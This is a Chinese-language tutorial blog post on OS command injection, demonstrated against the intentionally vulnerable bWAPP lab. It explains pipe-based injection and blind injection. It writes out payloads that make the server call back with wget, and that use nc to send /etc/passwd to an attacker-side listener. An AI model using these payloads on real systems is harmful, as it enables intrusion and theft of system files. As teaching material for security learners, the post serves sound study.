OS命令注入详解

关于OS命令执行漏洞我相信各位并不陌生,那今天我也就在这里分享一些OS命令注入的经验与技巧。

OS命令执行漏洞介绍:

原理:

应用程序有时需要调用一些执行系统命令的函数,如PHP中的SYSTEM,EXEC,SHELL_EXEC,POPEN,PROC_POPEN等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。

那这里首先说一下最简单的利用方式

在BWAPP中的OS命令注入一关中,程序对用户输入的网址进行IP解析,这里我们输入百度的网址可以直接把服务器的IP地址给解析出来

这里我们利用管道符号来执行系统命令

我们可以看到这里我们就执行了ls命令列出了网站目录文件。这是最为简单地一种利用方式。那接下来就来说一下OS命令盲注。

与SQL注入类似的是,OS命令盲注同样也不会在页面上返回太多的结果,但命令是的确执行了,同样这里使用的是BWAPP测试程序。

这里要求我们输入一个IP地址

执行之后发现页面没有返回执行结果,再输入管道符号执行命令发现同样也没有返回执行结果。

通过Burpsuit进行抓包

发现没有返回什么数据。

然后这里想到了用wget进行测试

Payload如下:

192.168.0.104 wget --post-data=”name=baobao”http://192.168.0.104:81/getfile.php

执行之后查看本地的Apache服务器日志发现有请求,这代表着服务器确实执行了我们的命令

在本地用NC运行nc -l -p 12345

然后在程序输入框中输入:

192.168.0.104 nc -w 1 192.168.0.104 12345 < /etc/passwd

成功接收到了数据,漏洞利用成功。

以上就是本次文章的全部内容

团队欢迎各位技术爱好者前来加入。

  • 发表于:
  • 原文链接:http://kuaibao.qq.com/s/20171210G0C2TG00?refer=cp_1026

扫码关注云+社区